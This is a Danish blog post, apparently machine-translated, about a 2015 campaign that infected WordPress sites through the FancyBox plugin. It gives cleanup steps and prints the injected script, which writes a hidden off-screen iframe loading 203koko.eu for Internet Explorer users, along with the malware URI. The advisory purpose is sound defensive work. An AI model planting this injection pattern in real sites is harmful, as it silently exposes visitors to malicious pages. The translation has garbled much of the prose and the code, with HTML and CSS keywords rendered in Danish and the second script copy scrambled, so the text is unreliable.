[Malware iframe 203koko] Malware Infected WordPress Websites

Tidligere i denne uge en række hjemmesider og blogs WordPress, har modtaget advarsler inficeret med malware igennem Google Webmasters.

Det problem, som Google Webmasters henvises til, er tilstedeværelsen af ​​en torsk / script iframe malware kilde websteder.

<Script> if (navigator.userAgent.match (/ MSIE / i)) {document.write ( '<div style = "position: absolut; venstre: -2000px; bredde: 2000px"> <iframe src = "http: / /203koko.eu/hjnfh/ipframe2.php "width =" 20 "height =" 30 "> </ iframe> </ div> '); } </ Script>

Det ser ud til, at det er en sårbarhed a pluginregelværk FancyBox til WordPress der indtil i går (05.02.2015) ikke havde været opdateret i lang tid.
Løsning af dette problem og desinfektion virus sites med denne malware er forholdsvis enkel.
1. Deaktiver FancyBox-plugin'en.
2. Slet alle FancyBox-pluginfiler fra serveren (via FTP)
3. Installer den nye version af plugin'et (Fancybox 3.0.4)

Fancybox for WordPress 3.0.4

- Omdøbt den indstilling, der er berørt af sikkerhedsproblemet, der er nævnt i 3.0.3. Dette bør stoppe den ondsindede kode fra at blive vist på websteder, hvor plugin'en opdateres uden at fjerne den ondsindede kode.

Fancybox for WordPress 3.0.3

- Rettet et sikkerhedsproblem.

Malware Info:

TYPE: Iframe omdirigering
TARGET: Fancybox WordPress
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = "20" height = "30"> </ iframe>
MALWARE script: <script> (navigator.userAgent.match / i) (/ MSIE) {<style = "position: absolut; venstre: -2000px; width: 2000px" div> hvis document.write ('

Fjern malware fra din WordPress websted.

[Malware iframe 203koko] Malware Infected WordPress Websites

Om forfatteren

Stealth LP

Stifter og redaktør stealth-indstillingerI 2006 dato.
Erfaringer på Linux operativsystemer (især CentOS), Mac OS X, Windows XP> Windows 10 og WordPress (CMS).

Efterlad en kommentar